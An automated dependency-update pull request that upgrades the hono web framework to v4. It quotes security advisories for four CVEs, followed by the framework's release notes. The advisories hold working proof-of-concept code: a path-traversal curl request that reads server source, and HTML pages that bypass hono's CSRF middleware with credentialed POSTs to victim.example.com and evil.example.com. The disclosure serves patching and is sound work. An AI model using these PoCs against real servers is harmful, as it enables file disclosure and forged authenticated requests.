fix(deps): update dependency hono to v4 [security]

[renovate[bot]]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
hono (source)	^2.3.0 -> ^4.0.0

GitHub Vulnerability Alerts

CVE-2023-50710

Impact

The clients may override named path parameter values from previous requests if the application is using TrieRouter. So, there is a risk that a privileged user may use unintended parameters when deleting REST API resources.

TrieRouter is used either explicitly or when the application matches a pattern that is not supported by the default RegExpRouter.

The code to reproduce it. The server side application:

import { Hono } from 'hono'
import { TrieRouter } from 'hono/router/trie-router'

const wait = async (ms: number) => {
  return new Promise((resolve) => {
    setTimeout(resolve, ms)
  })
}

const app = new Hono({ router: new TrieRouter() })

app.use('*', async (c, next) => {
  await wait(Math.random() * 200)
  return next()
})

app.get('/modules/:id/versions/:version', async (c) => {
  const id = c.req.param('id')
  const version = c.req.param('version')

  console.log('path', c.req.path)
  console.log('version', version)

  return c.json({
    id,
    version,
  })
})

export default app

The client code which makes requests to the server application:

const examples = [
  'http://localhost:8787/modules/first/versions/first',
  'http://localhost:8787/modules/second/versions/second',
  'http://localhost:8787/modules/third/versions/third',
]

const test = () => {
  for (const example of examples) {
    fetch(example)
      .then((response) => response.json())
      .then((data) => {
        const splitted = example.split('/')
        const expected = splitted[splitted.length - 1]

        if (expected !== data.version) {
          console.error(`Error: exprected ${expected} but got ${data.version} - url was ${example}`)
        }
      })
  }
}

test()

The results:

Error: exprected second but got third - url was http://localhost:8787/modules/second/versions/second
Error: exprected first but got third - url was http://localhost:8787/modules/first/versions/first

Patches

"v3.11.7" includes the change to fix this issue.

Workarounds

Don't use TrieRouter directly.

// DON'T USE TrieRouter
import { TrieRouter } from 'hono/router/trie-router'
const app = new Hono({ router: new TrieRouter() })

References

Router options on the Hono website: https://hono.dev/api/hono#router-option

CVE-2024-32869

Summary

When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial https://hono.dev/getting-started/deno

PoC

$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt

source

import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)

request

curl localhost:8000/static/%2e%2e/main.ts

response is content of main.ts

Impact

Unexpected files are retrieved.

CVE-2024-43787

Summary

Hono CSRF middleware can be bypassed using crafted Content-Type header.

Details

MIME types are case insensitive, but isRequestedByFormElementRe only matches lower-case.

https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17

As a result, attacker can bypass csrf middleware using upper-case form-like MIME type, such as "Application/x-www-form-urlencoded".

PoC

<html>
  <head>
    <title>CSRF Test</title>
    <script defer>
      document.addEventListener("DOMContentLoaded", () => {
        document.getElementById("btn").addEventListener("click", async () => {
          const res = await fetch("http://victim.example.com/test", {
            method: "POST",
            credentials: "include",
            headers: {
              "Content-Type": "Application/x-www-form-urlencoded",
            },
          });
        });
      });
    </script>
  </head>
  <body>
    <h1>CSRF Test</h1>
    <button id="btn">Click me!</button>
  </body>
</html>

Impact

Bypass csrf protection implemented with hono csrf middleware.

Discussion

I'm not sure that omitting csrf checks for Simple POST request is a good idea. CSRF prevention and CORS are different concepts even though CORS can prevent CSRF in some cases.

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

---

Release Notes

honojs/hono (hono)

### [`v4.6.5`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.5) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.4...v4.6.5) #### Security fix for CSRF Protection Middleware This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this `hono` package immediately. Before this release, a request without a `Content-Type` header can bypass the protection. This fix does not allow it. See: https://github.com/honojs/hono/security/advisories/GHSA-2234-fmw7-43wr #### What's Changed - perf(types): replace intersection with union to get better perf by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3443](https://redirect.github.com/honojs/hono/pull/3443) - ci: use Deno `v2` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3506](https://redirect.github.com/honojs/hono/pull/3506) - ci: use Deno v2 for a test running for deno by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3509](https://redirect.github.com/honojs/hono/pull/3509) - fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3507](https://redirect.github.com/honojs/hono/pull/3507) - fix(cors): avoid setting `Access-Control-Allow-Origin` if there is no matching origin by [@​uki00a](https://redirect.github.com/uki00a) in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510) - feat(powered-by): optional server name by [@​PatrickJS](https://redirect.github.com/PatrickJS) in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492) - fix(factory): revert PR [#​3498](https://redirect.github.com/honojs/hono/issues/3498) by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3515](https://redirect.github.com/honojs/hono/pull/3515) - fix(build): remove private fields by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3514](https://redirect.github.com/honojs/hono/pull/3514) #### New Contributors - [@​uki00a](https://redirect.github.com/uki00a) made their first contribution in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510) - [@​PatrickJS](https://redirect.github.com/PatrickJS) made their first contribution in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.4...v4.6.5 ### [`v4.6.4`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.4) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.3...v4.6.4) #### What's Changed - chore: upgrade dependencies by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3446](https://redirect.github.com/honojs/hono/pull/3446) - chore: remove `crypto-js` from dev dependencies by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3447](https://redirect.github.com/honojs/hono/pull/3447) - chore(test): suppress no-unused-vars "'x' is assigned a value but only used as type" by [@​exoego](https://redirect.github.com/exoego) in [https://github.com/honojs/hono/pull/3451](https://redirect.github.com/honojs/hono/pull/3451) - chore(test): include bun coverage by [@​exoego](https://redirect.github.com/exoego) in [https://github.com/honojs/hono/pull/3457](https://redirect.github.com/honojs/hono/pull/3457) - test(deno): remove duplicated app.get by [@​exoego](https://redirect.github.com/exoego) in [https://github.com/honojs/hono/pull/3469](https://redirect.github.com/honojs/hono/pull/3469) - fix(types): add key to IntrinsicAttributes by [@​codehz](https://redirect.github.com/codehz) in [https://github.com/honojs/hono/pull/3474](https://redirect.github.com/honojs/hono/pull/3474) - fix(factory): relax Bindings and Variables for `createMiddleware` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3498](https://redirect.github.com/honojs/hono/pull/3498) - fix(service-worker): bind fetch to `globalThis` by [@​sapphi-red](https://redirect.github.com/sapphi-red) in [https://github.com/honojs/hono/pull/3500](https://redirect.github.com/honojs/hono/pull/3500) - refactor(jsx): add `override` to `toStringToBuffer` in classes extending `JSXNode` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3505](https://redirect.github.com/honojs/hono/pull/3505) #### New Contributors - [@​sapphi-red](https://redirect.github.com/sapphi-red) made their first contribution in [https://github.com/honojs/hono/pull/3500](https://redirect.github.com/honojs/hono/pull/3500) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.3...v4.6.4 ### [`v4.6.3`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.3) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.2...v4.6.3) This release has many new features, but each feature is small, so we've released it as a patch release. #### What's Changed - chore: rename `runtime_tests` to `runtime-tests` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3419](https://redirect.github.com/honojs/hono/pull/3419) - ci: Type check perf by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3406](https://redirect.github.com/honojs/hono/pull/3406) - refactor(jsx/streaming): Clarified the type of renderToReadableStream. by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3434](https://redirect.github.com/honojs/hono/pull/3434) - perf(types): use homomorphic mapped type to reduce conditional branches by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3440](https://redirect.github.com/honojs/hono/pull/3440) - ci: prettify type check result and rm a comment by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3442](https://redirect.github.com/honojs/hono/pull/3442) - fix(types): useSyncExternalStore type by [@​codehz](https://redirect.github.com/codehz) in [https://github.com/honojs/hono/pull/3437](https://redirect.github.com/honojs/hono/pull/3437) - fix(combine/every): make `every` middleware work with short-circuiting middlewares by [@​paolostyle](https://redirect.github.com/paolostyle) in [https://github.com/honojs/hono/pull/3441](https://redirect.github.com/honojs/hono/pull/3441) - feat(secureHeader): add CSP Report-Only mode support by [@​isoppp](https://redirect.github.com/isoppp) in [https://github.com/honojs/hono/pull/3413](https://redirect.github.com/honojs/hono/pull/3413) - feat(jwt): make JwtVariables generic for improved type safety by [@​TinsFox](https://redirect.github.com/TinsFox) in [https://github.com/honojs/hono/pull/3428](https://redirect.github.com/honojs/hono/pull/3428) - feat(request): Make request.ts available throught JSR for frameworks that need to instantiate HonoRequest by [@​Sorikairox](https://redirect.github.com/Sorikairox) in [https://github.com/honojs/hono/pull/3425](https://redirect.github.com/honojs/hono/pull/3425) - feat(jsx/precompile): Normalization and stringification of attribute values as `renderToString` by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3432](https://redirect.github.com/honojs/hono/pull/3432) - feat(serve-static): support absolute root by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3420](https://redirect.github.com/honojs/hono/pull/3420) #### New Contributors - [@​codehz](https://redirect.github.com/codehz) made their first contribution in [https://github.com/honojs/hono/pull/3437](https://redirect.github.com/honojs/hono/pull/3437) - [@​paolostyle](https://redirect.github.com/paolostyle) made their first contribution in [https://github.com/honojs/hono/pull/3441](https://redirect.github.com/honojs/hono/pull/3441) - [@​isoppp](https://redirect.github.com/isoppp) made their first contribution in [https://github.com/honojs/hono/pull/3413](https://redirect.github.com/honojs/hono/pull/3413) - [@​TinsFox](https://redirect.github.com/TinsFox) made their first contribution in [https://github.com/honojs/hono/pull/3428](https://redirect.github.com/honojs/hono/pull/3428) - [@​Sorikairox](https://redirect.github.com/Sorikairox) made their first contribution in [https://github.com/honojs/hono/pull/3425](https://redirect.github.com/honojs/hono/pull/3425) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.2...v4.6.3 ### [`v4.6.2`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.2) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.1...v4.6.2) #### What's Changed - chore(lint): ESLint v9 by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3393](https://redirect.github.com/honojs/hono/pull/3393) - perf(serve-static): performance optimization for precompressed feature by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3414](https://redirect.github.com/honojs/hono/pull/3414) - fix(serve-static): use application/octet-stream if the mime type is not detected by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3415](https://redirect.github.com/honojs/hono/pull/3415) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.1...v4.6.2 ### [`v4.6.1`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.1) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.0...v4.6.1) #### What's Changed - fix(build): improve addExtension esbuild plugin by [@​kt3k](https://redirect.github.com/kt3k) in [https://github.com/honojs/hono/pull/3405](https://redirect.github.com/honojs/hono/pull/3405) #### New Contributors - [@​kt3k](https://redirect.github.com/kt3k) made their first contribution in [https://github.com/honojs/hono/pull/3405](https://redirect.github.com/honojs/hono/pull/3405) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.0...v4.6.1 ### [`v4.6.0`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.0) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.11...v4.6.0) Hono v4.6.0 is now available! One of the highlights of this release is the **Context Storage Middleware**. Let's introduce it. #### Context Storage Middleware Many users may have been waiting for this feature. The [**Context Storage Middleware**](https://hono.dev/docs/middleware/builtin/context-storage) uses `AsyncLocalStorage` to allow handling of the current Context object even outside of handlers. For example, let’s define a Hono app with a variable `message: string`. ```ts type Env = { Variables: { message: string } } const app = new Hono() ``` To enable Context Storage Middleware, register `contextStorage()` as middleware at the top and set the `message` value. ```ts import { contextStorage } from 'hono/context-storage' //... app.use(contextStorage()) app.use(async (c, next) => { c.set('message', 'Hello!') await next() }) ``` `getContext()` returns the current Context object, allowing you to get the value of the `message` variable outside the handler. ```ts import { getContext } from 'hono/context-storage' app.get('/', (c) => { return c.text(getMessage()) }) // Access the variable outside the handler. const getMessage = () => { return getContext().var.message } ``` In the case of Cloudflare Workers, you can also access the `Bindings` outside the handler by using this middleware. ```ts type Env = { Bindings: { KV: KVNamespace } } const app = new Hono() app.use(contextStorage()) const setKV = (value: string) => { return getContext().env.KV.put('key', value) } ``` Thanks [@​marceloverdijk](https://redirect.github.com/marceloverdijk) ! #### New features - feat(secureHeader): add Permissions-Policy header to secure headers middleware [https://github.com/honojs/hono/pull/3314](https://redirect.github.com/honojs/hono/pull/3314) - feat(cloudflare-pages): enable `c.env.eventContext` in handleMiddleware [https://github.com/honojs/hono/pull/3332](https://redirect.github.com/honojs/hono/pull/3332) - feat(websocket): Add generics type to `WSContext` [https://github.com/honojs/hono/pull/3337](https://redirect.github.com/honojs/hono/pull/3337) - feat(jsx-renderer): set `Content-Encoding` when `stream` is true [https://github.com/honojs/hono/pull/3355](https://redirect.github.com/honojs/hono/pull/3355) - feat(serveStatic): add `precompressed` option [https://github.com/honojs/hono/pull/3366](https://redirect.github.com/honojs/hono/pull/3366) - feat(helper/streaming): Support `Promise` or (async) `JSX.Element` in `streamSSE` [https://github.com/honojs/hono/pull/3344](https://redirect.github.com/honojs/hono/pull/3344) - feat(context): make fetch Response headers mutable [https://github.com/honojs/hono/pull/3318](https://redirect.github.com/honojs/hono/pull/3318) - feat(serve-static): add `onFound` option [https://github.com/honojs/hono/pull/3396](https://redirect.github.com/honojs/hono/pull/3396) - feat(basic-auth): added custom response message option [https://github.com/honojs/hono/pull/3371](https://redirect.github.com/honojs/hono/pull/3371) - feat(bearer-auth): added custom response message options [https://github.com/honojs/hono/pull/3372](https://redirect.github.com/honojs/hono/pull/3372) #### Other changes - chore(jsx-renderer): fix typo in JSDoc by [@​taga3s](https://redirect.github.com/taga3s) in [https://github.com/honojs/hono/pull/3378](https://redirect.github.com/honojs/hono/pull/3378) - chore(deno): use the latest jsr libraries for testing by [@​ryuapp](https://redirect.github.com/ryuapp) in [https://github.com/honojs/hono/pull/3375](https://redirect.github.com/honojs/hono/pull/3375) - fix(secure-headers): optimize getPermissionsPolicyDirectives function by [@​kbkn3](https://redirect.github.com/kbkn3) in [https://github.com/honojs/hono/pull/3398](https://redirect.github.com/honojs/hono/pull/3398) - fix(bearer-auth): typo by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3404](https://redirect.github.com/honojs/hono/pull/3404) #### New Contributors - [@​kbkn3](https://redirect.github.com/kbkn3) made their first contribution in [https://github.com/honojs/hono/pull/3314](https://redirect.github.com/honojs/hono/pull/3314) - [@​hayatosc](https://redirect.github.com/hayatosc) made their first contribution in [https://github.com/honojs/hono/pull/3337](https://redirect.github.com/honojs/hono/pull/3337) - [@​inetol](https://redirect.github.com/inetol) made their first contribution in [https://github.com/honojs/hono/pull/3366](https://redirect.github.com/honojs/hono/pull/3366) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.11...v4.6.0 ### [`v4.5.11`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.11) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.10...v4.5.11) #### What's Changed - fix(jsx): race condition in ErrorBoundary with event loop by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3343](https://redirect.github.com/honojs/hono/pull/3343) - perf(jsx): skip the special behavior when the element is in the head. by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3352](https://redirect.github.com/honojs/hono/pull/3352) - refactor(utils/body): shorten the code by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3353](https://redirect.github.com/honojs/hono/pull/3353) - docs: `Twitter` to `X` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3354](https://redirect.github.com/honojs/hono/pull/3354) - chore: fix typo in JSDoc by [@​taga3s](https://redirect.github.com/taga3s) in [https://github.com/honojs/hono/pull/3364](https://redirect.github.com/honojs/hono/pull/3364) - refactor(utils/basic-auth): Moved Internal function to utils by [@​sugar-cat7](https://redirect.github.com/sugar-cat7) in [https://github.com/honojs/hono/pull/3359](https://redirect.github.com/honojs/hono/pull/3359) #### New Contributors - [@​taga3s](https://redirect.github.com/taga3s) made their first contribution in [https://github.com/honojs/hono/pull/3364](https://redirect.github.com/honojs/hono/pull/3364) - [@​sugar-cat7](https://redirect.github.com/sugar-cat7) made their first contribution in [https://github.com/honojs/hono/pull/3359](https://redirect.github.com/honojs/hono/pull/3359) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.10...v4.5.11 ### [`v4.5.10`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.10) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.9...v4.5.10) #### What's Changed - feat(compress): improve compress middleware by [@​nitedani](https://redirect.github.com/nitedani) in [https://github.com/honojs/hono/pull/3317](https://redirect.github.com/honojs/hono/pull/3317) - feat(jsx): add popover api attributes by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3323](https://redirect.github.com/honojs/hono/pull/3323) - feat(jsx): improve form attribute types by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3330](https://redirect.github.com/honojs/hono/pull/3330) - chore(test): migrate to vitest v2 by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3326](https://redirect.github.com/honojs/hono/pull/3326) - chore(test): replace deprecated vitest type by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3338](https://redirect.github.com/honojs/hono/pull/3338) - fix(logger): removing spaces from logger by [@​marceloverdijk](https://redirect.github.com/marceloverdijk) in [https://github.com/honojs/hono/pull/3334](https://redirect.github.com/honojs/hono/pull/3334) #### New Contributors - [@​nitedani](https://redirect.github.com/nitedani) made their first contribution in [https://github.com/honojs/hono/pull/3317](https://redirect.github.com/honojs/hono/pull/3317) - [@​marceloverdijk](https://redirect.github.com/marceloverdijk) made their first contribution in [https://github.com/honojs/hono/pull/3334](https://redirect.github.com/honojs/hono/pull/3334) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.9...v4.5.10 ### [`v4.5.9`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.9) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.8...v4.5.9) #### What's Changed - test(types): broken test in future versions of typescript by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3310](https://redirect.github.com/honojs/hono/pull/3310) - fix(utils/color): Deno does not require permission for `NO_COLOR` by [@​ryuapp](https://redirect.github.com/ryuapp) in [https://github.com/honojs/hono/pull/3306](https://redirect.github.com/honojs/hono/pull/3306) - feat(jsx): improve `type` (MIME) attribute types by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3305](https://redirect.github.com/honojs/hono/pull/3305) - feat(pretty-json): support custom query by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3300](https://redirect.github.com/honojs/hono/pull/3300) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.8...v4.5.9 ### [`v4.5.8`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.8) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.7...v4.5.8) ##### Security Fix for CSRF Protection Middleware Before this release, in versions 4.5.7 and below, the CSRF Protection Middleware did not treat requests including `Content-Types` with uppercase letters (e.g., `Application/x-www-form-urlencoded`) as potential attacks, allowing them to pass. This could cause unexpected behavior, leading to a vulnerability. If you are using the CSRF Protection Middleware, please upgrade to version 4.5.8 or higher immediately. For more details, see the report here: https://github.com/honojs/hono/security/advisories/GHSA-rpfr-3m35-5vx5 ### [`v4.5.7`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.7) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.6...v4.5.7) ##### What's Changed - fix(jsx/dom): Fixed a bug that caused Script elements to turn into Style elements. by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3294](https://redirect.github.com/honojs/hono/pull/3294) - perf(jsx/dom): improve performance by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3288](https://redirect.github.com/honojs/hono/pull/3288) - feat(jsx): improve a-tag types with well known values by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3287](https://redirect.github.com/honojs/hono/pull/3287) - fix(validator): Fixed a bug in hono/validator where URL Encoded Data could not be validated if the Content-Type included charset. by [@​uttk](https://redirect.github.com/uttk) in [https://github.com/honojs/hono/pull/3297](https://redirect.github.com/honojs/hono/pull/3297) - feat(jsx): improve `target` and `formtarget` attribute types by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3299](https://redirect.github.com/honojs/hono/pull/3299) - docs(README): change Twitter to X by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3301](https://redirect.github.com/honojs/hono/pull/3301) - fix(client): replace optional params to url correctly by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3304](https://redirect.github.com/honojs/hono/pull/3304) - feat(jsx): improve input attribute types based on react by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3302](https://redirect.github.com/honojs/hono/pull/3302) ##### New Contributors - [@​uttk](https://redirect.github.com/uttk) made their first contribution in [https://github.com/honojs/hono/pull/3297](https://redirect.github.com/honojs/hono/pull/3297) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.6...v4.5.7 ### [`v4.5.6`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.6) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.5...v4.5.6) #### What's Changed - fix(jsx): handle async component error explicitly and throw the error in the response by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3274](https://redirect.github.com/honojs/hono/pull/3274) - fix(validator): support multipart headers without a separating space by [@​Ernxst](https://redirect.github.com/Ernxst) in [https://github.com/honojs/hono/pull/3286](https://redirect.github.com/honojs/hono/pull/3286) - fix(validator): Allow form data will mutliple values appended by [@​nicksrandall](https://redirect.github.com/nicksrandall) in [https://github.com/honojs/hono/pull/3273](https://redirect.github.com/honojs/hono/pull/3273) - feat(jsx): improve meta-tag types with well known values by [@​ssssota](https://redirect.github.com/ssssota) in [https://github.com/honojs/hono/pull/3276](https://redirect.github.com/honojs/hono/pull/3276) #### New Contributors - [@​Ernxst](https://redirect.github.com/Ernxst) made their first contribution in [https://github.com/honojs/hono/pull/3286](https://redirect.github.com/honojs/hono/pull/3286) - [@​ssssota](https://redirect.github.com/ssssota) made their first contribution in [https://github.com/honojs/hono/pull/3276](https://redirect.github.com/honojs/hono/pull/3276) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.5...v4.5.6 ### [`v4.5.5`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.5) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.4...v4.5.5) #### What's Changed - fix(jsx): allow null, undefined, and boolean to be returned from function component by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3241](https://redirect.github.com/honojs/hono/pull/3241) - feat(context): Add types for `c.header` by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3221](https://redirect.github.com/honojs/hono/pull/3221) - fix(jsx): fix draggable type to accept boolean by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3253](https://redirect.github.com/honojs/hono/pull/3253) - feat(context): add Context-Type types to `c.header` by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3255](https://redirect.github.com/honojs/hono/pull/3255) - fix(serve-static): supports directory contains `.` and not end `/` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3256](https://redirect.github.com/honojs/hono/pull/3256) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.4...v4.5.5 ### [`v4.5.4`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.4) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.3...v4.5.4) ##### What's Changed - fix(jsx): corrects the type of 'draggable' attribute in intrinsic-elements.ts by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3224](https://redirect.github.com/honojs/hono/pull/3224) - feat(jsx): allow to merge CSSProperties declaration by [@​jonasnobile](https://redirect.github.com/jonasnobile) in [https://github.com/honojs/hono/pull/3228](https://redirect.github.com/honojs/hono/pull/3228) - feat(client): Add WebSocket Provider Integration Tests and Enhance WebSocket Initialization by [@​naporin0624](https://redirect.github.com/naporin0624) in [https://github.com/honojs/hono/pull/3213](https://redirect.github.com/honojs/hono/pull/3213) - fix(types): `param` in `ValidationTargets` supports optional param by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3229](https://redirect.github.com/honojs/hono/pull/3229) ##### New Contributors - [@​jonasnobile](https://redirect.github.com/jonasnobile) made their first contribution in [https://github.com/honojs/hono/pull/3228](https://redirect.github.com/honojs/hono/pull/3228) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.3...v4.5.4 ### [`v4.5.3`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.3) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.2...v4.5.3) #### What's Changed - fix(validator): Add double quotation marks to multipart checker regex by [@​CPlusPatch](https://redirect.github.com/CPlusPatch) in [https://github.com/honojs/hono/pull/3195](https://redirect.github.com/honojs/hono/pull/3195) - fix(validator): support `application/json` with a charset as JSON by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3199](https://redirect.github.com/honojs/hono/pull/3199) - fix(jsx): fix handling of SVG elements in JSX. by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3204](https://redirect.github.com/honojs/hono/pull/3204) - fix(jsx/dom): fix performance issue with adding many new node listings by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3205](https://redirect.github.com/honojs/hono/pull/3205) - fix(service-worker): refer to `self.fetch` correctly by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3200](https://redirect.github.com/honojs/hono/pull/3200) #### New Contributors - [@​CPlusPatch](https://redirect.github.com/CPlusPatch) made their first contribution in [https://github.com/honojs/hono/pull/3195](https://redirect.github.com/honojs/hono/pull/3195) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.2...v4.5.3 ### [`v4.5.2`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.2) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.1...v4.5.2) #### What's Changed - fix(helper/adapter): don't check `navigator` is `undefined` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3171](https://redirect.github.com/honojs/hono/pull/3171) - fix(types): handle readonly array correctly by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3172](https://redirect.github.com/honojs/hono/pull/3172) - Revert "fix(helper/adapter): don't check `navigator` is `undefined` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3173](https://redirect.github.com/honojs/hono/pull/3173) - fix(type): degradation of generic type handling by [@​m-shaka](https://redirect.github.com/m-shaka) in 